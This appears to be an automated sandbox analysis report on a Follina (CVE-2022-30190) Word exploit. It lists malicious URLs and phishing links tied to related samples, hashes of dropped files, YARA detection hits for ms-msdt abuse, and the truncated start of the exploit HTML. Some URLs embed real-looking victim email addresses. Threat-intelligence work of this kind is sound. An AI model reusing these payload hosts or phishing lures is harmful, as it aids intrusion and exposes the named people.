	File.exe	Get hash	malicious	Browse	52.95.142.38
	tlWwJTii1Z.exe	Get hash	malicious	Browse	52.95.150.166
	WmNlRsNVI8.exe	Get hash	malicious	Browse	52.95.148.106
	wpJqviS40a.exe	Get hash	malicious	Browse	52.95.144.42
	4879803B6326F27BB8B68448FE7394B2358C2EEB25EC2.exe	Get hash	malicious	Browse	52.95.143.34
	DY6NIa6uCJ.exe	Get hash	malicious	Browse	52.95.148.78
	AIlUgor6h7.exe	Get hash	malicious	Browse	52.95.143.46
	7S6KBG5w7W.exe	Get hash	malicious	Browse	52.95.142.18
	setup_installer.exe	Get hash	malicious	Browse	52.95.149.58
	fIlUUmpx1U.exe	Get hash	malicious	Browse	52.95.149.42
	setup_x86_x64_install.exe	Get hash	malicious	Browse	52.95.149.162
	setup_x86_x64_install.exe	Get hash	malicious	Browse	52.95.149.166
	Paystub for mark.morgan @ blueyonder.com.html	Get hash	malicious	Browse	52.95.150.94
	Paystub for cwillard.html	Get hash	malicious	Browse	52.95.148.138
	https://spring11.s3.eu-west-2.amazonaws.com/dc93800-19-2.zip	Get hash	malicious	Browse	52.95.149.14
	https://inv9.glasscubes.com/share/s/l3adt1qob4pq7sv9e99i23ssmb	Get hash	malicious	Browse	52.95.148.66

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
AMAZON-02US	freight invoice.exe	Get hash	malicious	Browse	75.2.26.18
	https://0ff356uresincprivatedsecuredsharedvoicemail-file.aha.io/shared/97bda535804dec9ec9513f0118f13873	Get hash	malicious	Browse	13.224.103.90
	#U260e voice042456432-121_076_454656_3-2(4).html	Get hash	malicious	Browse	108.157.4.98
	https://ipfs.io/ipfs/QmSRdhndPNUWf8qD1t2VRQUX2SZCH1o1uj964vhhnENhrX/#ken.sourjohn@spirithalloween.com	Get hash	malicious	Browse	13.32.121.14
	https://www.dropbox.com/scl/fi/5e8yxtv2hme0jil8jyv7p/You-have-been-invited-you-to-view-the-folder-PO48668_48110_.paper?dl=0&rlkey=lbyce6ni3ne51ffjqckmx0hv2	Get hash	malicious	Browse	13.224.103.76
	SecuriteInfo.com.W32.SmokeLoader.C.genEldorado.4925.exe	Get hash	malicious	Browse	52.217.92.108
	XBtHx41Ruc.exe	Get hash	malicious	Browse	104.192.141.1
	http://propertyconceptscommercial.com	Get hash	malicious	Browse	18.218.167.159
	http://propertyconceptscommercial.com	Get hash	malicious	Browse	3.130.234.162
	https://www.dropbox.com/scl/fi/vx411mbr29t5hn9h338q8/You-have-been-invited-to-view-the-folder-PO986078_30840_89.paper?dl=0&rlkey=7y27s248ly2fxgpkbzj9vrzhm	Get hash	malicious	Browse	13.224.103.119
	d67taAtF6k.exe	Get hash	malicious	Browse	104.192.141.1
	1kTl1FqLU2	Get hash	malicious	Browse	35.75.159.104
	https://www.dropbox.com/scl/fi/xbswjm95q3okdow07ugij/Untitled.paper?dl=0&rlkey=b9m5doopdmkisjeguuxpbxo05&data=05%7C01%7CTerri_Evans@baylor.edu%7Ca7f76115975243ac41dd08da80774281%7C22d2fb35256a459bbcf4dc23d42dc0a4%7C0%7C0%7C637963546981985253%7CUnknown%7CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0=%7C0%7C%7C%7C&sdata=cqj0u0/FUCYEomYpxhlnGpckTyxiu5PQFKvFlpTtqDc=&reserved=0	Get hash	malicious	Browse	13.224.103.103
	https://www.dropbox.com/scl/fi/rfhsc8zxjxdlafahtq7kg/Baskerville-Donovan.paper?dl=0&rlkey=5po4h00cq2n31zzbzm8ttwgkq	Get hash	malicious	Browse	13.224.103.76
	https://uspps.delivery/Package	Get hash	malicious	Browse	13.224.90.240
	Fafp1MozEr.exe	Get hash	malicious	Browse	52.217.101.172
	QnD9G3EDPF.exe	Get hash	malicious	Browse	52.217.88.236
	J1j2AmKkNE.exe	Get hash	malicious	Browse	52.216.227.152
	2aa6hVVLY8.exe	Get hash	malicious	Browse	52.217.138.193
	cTl94OLYPR.exe	Get hash	malicious	Browse	104.192.141.1
AMAZON-02US	freight invoice.exe	Get hash	malicious	Browse	75.2.26.18
	https://0ff356uresincprivatedsecuredsharedvoicemail-file.aha.io/shared/97bda535804dec9ec9513f0118f13873	Get hash	malicious	Browse	13.224.103.90
	#U260e voice042456432-121_076_454656_3-2(4).html	Get hash	malicious	Browse	108.157.4.98
	https://ipfs.io/ipfs/QmSRdhndPNUWf8qD1t2VRQUX2SZCH1o1uj964vhhnENhrX/#ken.sourjohn@spirithalloween.com	Get hash	malicious	Browse	13.32.121.14
	https://www.dropbox.com/scl/fi/5e8yxtv2hme0jil8jyv7p/You-have-been-invited-you-to-view-the-folder-PO48668_48110_.paper?dl=0&rlkey=lbyce6ni3ne51ffjqckmx0hv2	Get hash	malicious	Browse	13.224.103.76
	SecuriteInfo.com.W32.SmokeLoader.C.genEldorado.4925.exe	Get hash	malicious	Browse	52.217.92.108
	XBtHx41Ruc.exe	Get hash	malicious	Browse	104.192.141.1
	http://propertyconceptscommercial.com	Get hash	malicious	Browse	18.218.167.159
	http://propertyconceptscommercial.com	Get hash	malicious	Browse	3.130.234.162
	https://www.dropbox.com/scl/fi/vx411mbr29t5hn9h338q8/You-have-been-invited-to-view-the-folder-PO986078_30840_89.paper?dl=0&rlkey=7y27s248ly2fxgpkbzj9vrzhm	Get hash	malicious	Browse	13.224.103.119
	d67taAtF6k.exe	Get hash	malicious	Browse	104.192.141.1
	1kTl1FqLU2	Get hash	malicious	Browse	35.75.159.104
	https://www.dropbox.com/scl/fi/xbswjm95q3okdow07ugij/Untitled.paper?dl=0&rlkey=b9m5doopdmkisjeguuxpbxo05&data=05%7C01%7CTerri_Evans@baylor.edu%7Ca7f76115975243ac41dd08da80774281%7C22d2fb35256a459bbcf4dc23d42dc0a4%7C0%7C0%7C637963546981985253%7CUnknown%7CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0=%7C0%7C%7C%7C&sdata=cqj0u0/FUCYEomYpxhlnGpckTyxiu5PQFKvFlpTtqDc=&reserved=0	Get hash	malicious	Browse	13.224.103.103
	https://www.dropbox.com/scl/fi/rfhsc8zxjxdlafahtq7kg/Baskerville-Donovan.paper?dl=0&rlkey=5po4h00cq2n31zzbzm8ttwgkq	Get hash	malicious	Browse	13.224.103.76
	https://uspps.delivery/Package	Get hash	malicious	Browse	13.224.90.240
	Fafp1MozEr.exe	Get hash	malicious	Browse	52.217.101.172
	QnD9G3EDPF.exe	Get hash	malicious	Browse	52.217.88.236
	J1j2AmKkNE.exe	Get hash	malicious	Browse	52.216.227.152
	2aa6hVVLY8.exe	Get hash	malicious	Browse	52.217.138.193
	cTl94OLYPR.exe	Get hash	malicious	Browse	104.192.141.1

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
05af1f5ca1b87cc9cc9b25185115607d	dfqqRjnCV5.docx	Get hash	malicious	Browse	3.5.246.192 52.95.148.170
	uaMVRwwuyZ.docx	Get hash	malicious	Browse	3.5.246.192 52.95.148.170
	SOA USD 85,200.00.docx	Get hash	malicious	Browse	3.5.246.192 52.95.148.170
	ORDER 4X30DB.docx	Get hash	malicious	Browse	3.5.246.192 52.95.148.170
	Order 90541#.docx	Get hash	malicious	Browse	3.5.246.192 52.95.148.170
	NextEra RFQ and Business Proposition.docx	Get hash	malicious	Browse	3.5.246.192 52.95.148.170
	BL-20-89DS.docx	Get hash	malicious	Browse	3.5.246.192 52.95.148.170
	NOA & Pre-loading docs of CBHU9101956.docx	Get hash	malicious	Browse	3.5.246.192 52.95.148.170
	Product_specification_1.docx	Get hash	malicious	Browse	3.5.246.192 52.95.148.170
	NOA & Pre-loading docs of CBHU9101956.docx	Get hash	malicious	Browse	3.5.246.192 52.95.148.170
	NewXOrder.xlsm	Get hash	malicious	Browse	3.5.246.192 52.95.148.170
	payroll_details.docm	Get hash	malicious	Browse	3.5.246.192 52.95.148.170
	payroll_details.docm	Get hash	malicious	Browse	3.5.246.192 52.95.148.170
	B86i0Iwc4H.docx	Get hash	malicious	Browse	3.5.246.192 52.95.148.170
	NEW ORDER EM067022.docx	Get hash	malicious	Browse	3.5.246.192 52.95.148.170
	A_Ponudu 6885242958.docx	Get hash	malicious	Browse	3.5.246.192 52.95.148.170
	Q2_FECDRA Ponudu.docx	Get hash	malicious	Browse	3.5.246.192 52.95.148.170
	aaaaaaaaaaa.docx	Get hash	malicious	Browse	3.5.246.192 52.95.148.170
	QUOTE2022.xlsx	Get hash	malicious	Browse	3.5.246.192 52.95.148.170
	scanned Revised Annexure-IX.xlsx	Get hash	malicious	Browse	3.5.246.192 52.95.148.170
7dcce5b76c8b17472d024758970a406b	dfqqRjnCV5.docx	Get hash	malicious	Browse	3.5.244.102
	uaMVRwwuyZ.docx	Get hash	malicious	Browse	3.5.244.102
	Product Data Sheet.xlsx	Get hash	malicious	Browse	3.5.244.102
	transcation_swift_dload_16Aug2022_15324.doc	Get hash	malicious	Browse	3.5.244.102
	SOA USD 85,200.00.docx	Get hash	malicious	Browse	3.5.244.102
	ORDER 4X30DB.docx	Get hash	malicious	Browse	3.5.244.102
	SecuriteInfo.com.Exploit.Siggen3.17149.4489.xls	Get hash	malicious	Browse	3.5.244.102
	SecuriteInfo.com.Exploit.Siggen3.17149.11632.xls	Get hash	malicious	Browse	3.5.244.102
	SecuriteInfo.com.Exploit.Siggen3.17149.3543.xls	Get hash	malicious	Browse	3.5.244.102
	SecuriteInfo.com.Exploit.Siggen3.17149.10211.xls	Get hash	malicious	Browse	3.5.244.102
	SecuriteInfo.com.Exploit.Siggen3.17149.24514.xls	Get hash	malicious	Browse	3.5.244.102
	SecuriteInfo.com.Exploit.Siggen3.17149.32268.xls	Get hash	malicious	Browse	3.5.244.102
	SecuriteInfo.com.Exploit.Siggen3.17149.6905.xls	Get hash	malicious	Browse	3.5.244.102
	Order 90541#.docx	Get hash	malicious	Browse	3.5.244.102
	SecuriteInfo.com.Exploit.Siggen3.17149.12724.xls	Get hash	malicious	Browse	3.5.244.102
	SecuriteInfo.com.Exploit.Siggen3.17149.8245.xls	Get hash	malicious	Browse	3.5.244.102
	SecuriteInfo.com.Exploit.Siggen3.17149.13096.xls	Get hash	malicious	Browse	3.5.244.102
	SecuriteInfo.com.Exploit.Siggen3.17149.5932.xls	Get hash	malicious	Browse	3.5.244.102
	SecuriteInfo.com.Exploit.Siggen3.17149.4633.xls	Get hash	malicious	Browse	3.5.244.102
	00187679526.xlsx	Get hash	malicious	Browse	3.5.244.102

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	0.28546168775466585
Encrypted:	false
SSDEEP:	48:I3eMRBuhPaKP/G1svEPA7eJMw9mOrY149fn6FrwjtiXMiXsH:KNLKyKnA79fn6JDLsH
MD5:	819347F4E445339164B92BBC284DFC12
SHA1:	781396E867E2EC6001C0E3158DB663604FDA8C5F
SHA-256:	DD2FFBA4C1742BC78E9FDBDB47E876A391A4EFE0E2CAC23E9D182F0590701DB7
SHA-512:	3F227DDE16D0521CB4AABBDEB14A29D293B5B15E9592520993D197697B2CAAA2AF8AC33294CA9DC19A58F7020FD9736224E9DF68D5A009393C40FABE2E4EDA5E
Malicious:	false
Reputation:	low
Preview:	......M.eFy...z?.....@C.]......S,...X.F...Fa.q...................................M.."............!O..]..F.....z.A...................................E...............................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G.........J..R.w.ps............................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{B11B56B7-FF16-4429-B914-E820C021DA19}.FSD

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	0.6724360935500183
Encrypted:	false
SSDEEP:	96:KmfCyg5V7joGjWBkWphj3B4QPJC767fVrRR:zgQGa7fRfV
MD5:	96413703B72C526AA110FCAE29017058
SHA1:	97232D47710AB7842FC9E432CD7BF87CE595B7E1
SHA-256:	EB406B0E2C455855011BDA7D02AF872159692917A4379D284F699E42000C0A83
SHA-512:	A36CB373E76DD795F821916E0AA8BE62C7F695D58044E98F94BFE92DB181F4D838F8E1D2329C62CB33FF8DD6A19FB850BDFAF9086EE8A83EB5A6270ECABE986E
Malicious:	false
Reputation:	low
Preview:	......M.eFy...z2.fs..AB.].]BFH.S,...X.F...Fa.q.............................ws..(?H..R.3&.m.........6k.b.8N...HHsb`.S...................................W...............................x...x...x...x..*............................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G.....5.2A....................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSF-CTBL.FSF

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	114
Entropy (8bit):	3.9451300008641605
Encrypted:	false
SSDEEP:	3:yVlgsRlzvKlTlIsTdld3eVl8hlMILlZ276:yPblzyrIQXeP8zMIf22
MD5:	4B62421B1F4358F2D084FBF3591185C8
SHA1:	A52999672F6943C250B5B9C985984E155CD925DC
SHA-256:	BF4A253C2EE0DB470F9662B54E074E55FF8B4CF3D506B61018B314C1B9FD6948
SHA-512:	A0623064339AA94377688A98FD377A95A8B050483F8CA9E1E5C90AA27E4154DC2210441DBA9C51089304CF444A9A7897B898505D187D3714B0BF0E37F4C5D5AA
Malicious:	false
Reputation:	low
Preview:	..H..@....b..q....]F.S.D.-.{.B.1.1.B.5.6.B.7.-.F.F.1.6.-.4.4.2.9.-.B.9.1.4.-.E.8.2.0.C.0.2.1.D.A.1.9.}...F.S.D..

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	0.28746439393875955
Encrypted:	false
SSDEEP:	48:I3CRBICnBS4hmtUKdx5t5Ido5di5N785LkrU5qKJ5AsKIKo5KobH:KCLj01Hqb8GU0YasrJrH
MD5:	1CF1F2C36141022DAEA5DE8B56035037
SHA1:	A91C691900D5C689B4A8D317012F426A6C9FE8F1
SHA-256:	7F183CF286131B3B0AA3ACA6C95ABB323853DAFEB990BB07ABD882B816902166
SHA-512:	B71C7C9AD2F2CB652F9B38B6F1BFAEFBAA3E1C250E800FC827909FB77B1113F3A61EF4658ED42F605718409B00C7ABB94E16C65446780072486C1A028A3672B2
Malicious:	false
Reputation:	low
Preview:	......M.eFy...zL..q).BG. 1h...oS,...X.F...Fa.q.............................3..".ON...o{.t..........:"\.x&E...&A.q..A...................................E...............................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G.........J..R.w.ps............................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{7808CAC8-5245-4C0B-9091-621941B6E1B1}.FSD

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	0.22061925751546507
Encrypted:	false
SSDEEP:	24:I3FLwnM0B34XdkmXtUZi9zhA/0taMTw1ky4c+eqtqfBKa3gQtckWv9PgIi3YPqDX:I3FUrBq79C/yo210ulli3VTITc
MD5:	45FBD8495A8429D64F051DB0AC32F202
SHA1:	7A06F13C88842D62F108EF611CAB885F893BC7DE
SHA-256:	F370DD4FA387873D45BDC69DF3309E3509B61393F74D51730AB94908B18C5AC5
SHA-512:	8E2A4DFBCA74D0A3D7E23641DDE0A28400C29ACD9AAD6A0140EF9B38DD522D22DF822A103E45F36D267B4E5BE0AFBFD98723FB216CB71BEFE5D31AF90DD172EE
Malicious:	false
Reputation:	low
Preview:	......M.eFy...zemB.q.K..B....vS,...X.F...Fa.q..................................@.l.f.a_............m ..M...c3.J.P>..................................PB...............................x...x...x...x..........+....................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G...\|.u-.u.A...W"U.............................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSF-{0E1EEE64-E8C6-4E2A-9759-63CF07FD8988}.FSF

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	114
Entropy (8bit):	3.983641926526995
Encrypted:	false
SSDEEP:	3:yVlgsRlzwcklmFVknIGc6URlwRcgl276:yPblzhk8EnICXRD22
MD5:	5BA39420AAAE5F8B988907E9625CAA17
SHA1:	43E4A971951EAB9CC8C5E98F302C108D3DF606A7
SHA-256:	7E3ADF522B61CD36D7E8ABBAB3A3F561F32A639C3050204E67712D6C465D5D82
SHA-512:	FBAA36AE24C2B2CC2124021045B2FEB87B2ABD3C77C99B8B64451449C44B2AEAE0127C00E25FF359BAEED1B8499D2232FAAB9F177CEBD79490058EEE386B345B
Malicious:	false
Reputation:	low
Preview:	..H..@....b..q....]F.S.D.-.{.7.8.0.8.C.A.C.8.-.5.2.4.5.-.4.C.0.B.-.9.0.9.1.-.6.2.1.9.4.1.B.6.E.1.B.1.}...F.S.D..

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\fb0f9c45-fb5f-4690-9815-e11a762d4739[1].htm

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	HTML document, ASCII text, with very long lines, with CRLF line terminators
Category:	downloaded
Size (bytes):	6837
Entropy (8bit):	0.861791117899086
Encrypted:	false
SSDEEP:	12:qTWvzSExH8d2GZf1NGwtMQwue4Sv8VM1Gb:0WradlR1N7GD34S0VMG
MD5:	BFBFA8FDDA62476690C9077946372EAA
SHA1:	BBD80340C07F716600B54242F11F25E1BDC442F2
SHA-256:	A353DB4CFD64F1876F3F99BE6481189DBF5E770D71B8D03CBA84FF551EDBCDC6
SHA-512:	7B234021E52E4CA1B14F93F12CC23DD61B135DCC57512672BF97DC1CC2D964072DB2F82E91CBDFCA41177D3B707E98F1C895C094D0D237A3505BB2606B8FD5CC
Malicious:	true
Yara Hits:	Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\fb0f9c45-fb5f-4690-9815-e11a762d4739[1].htm, Author: Nasreddine Bencherchali, Christian Burkard Rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\fb0f9c45-fb5f-4690-9815-e11a762d4739[1].htm, Author: Tobias Michalski, Christian Burkard Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\fb0f9c45-fb5f-4690-9815-e11a762d4739[1].htm, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100%
Reputation:	low
IE Cache URL:	https://sqdocs.s3.eu-west-2.amazonaws.com/fb0f9c45-fb5f-4690-9815-e11a762d4739.html
Preview:	<!doctype html>..<html lang="en">..<body>..<script>..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAA

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E839A722.htm

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	HTML document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	6837
Entropy (8bit):	0.861791117899086
Encrypted:	false
SSDEEP:	12:qTWvzSExH8d2GZf1NGwtMQwue4Sv8VM1Gb:0WradlR1N7GD34S0VMG
MD5:	BFBFA8FDDA62476690C9077946372EAA
SHA1:	BBD80340C07F716600B54242F11F25E1BDC442F2
SHA-256:	A353DB4CFD64F1876F3F99BE6481189DBF5E770D71B8D03CBA84FF551EDBCDC6
SHA-512:	7B234021E52E4CA1B14F93F12CC23DD61B135DCC57512672BF97DC1CC2D964072DB2F82E91CBDFCA41177D3B707E98F1C895C094D0D237A3505BB2606B8FD5CC
Malicious:	true
Yara Hits:	Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E839A722.htm, Author: Nasreddine Bencherchali, Christian Burkard Rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E839A722.htm, Author: Tobias Michalski, Christian Burkard Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E839A722.htm, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100%
Reputation:	low
Preview:	<!doctype html>..<html lang="en">..<body>..<script>..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAA

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EBAE70F4.htm

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	HTML document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	6837
Entropy (8bit):	0.861791117899086
Encrypted:	false
SSDEEP:	12:qTWvzSExH8d2GZf1NGwtMQwue4Sv8VM1Gb:0WradlR1N7GD34S0VMG
MD5:	BFBFA8FDDA62476690C9077946372EAA
SHA1:	BBD80340C07F716600B54242F11F25E1BDC442F2
SHA-256:	A353DB4CFD64F1876F3F99BE6481189DBF5E770D71B8D03CBA84FF551EDBCDC6
SHA-512:	7B234021E52E4CA1B14F93F12CC23DD61B135DCC57512672BF97DC1CC2D964072DB2F82E91CBDFCA41177D3B707E98F1C895C094D0D237A3505BB2606B8FD5CC
Malicious:	true
Yara Hits:	Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EBAE70F4.htm, Author: Nasreddine Bencherchali, Christian Burkard Rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EBAE70F4.htm, Author: Tobias Michalski, Christian Burkard Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EBAE70F4.htm, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100%
Reputation:	low
Preview:	<!doctype html>..<html lang="en">..<body>..<script>..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAA

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{855EAE4E-7E59-44E5-8AE0-040E73EE4059}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	5632
Entropy (8bit):	2.426355213517755
Encrypted:	false
SSDEEP:	24:rk+AK/PlpJbtOw5vKAB4cn3lWnoAABsigtOw5vKABOKABsiI:rk+1n7t5vKjW3TAxiSt5vK1Kxi
MD5:	D0556DD3F824845B8273E5E41479D916
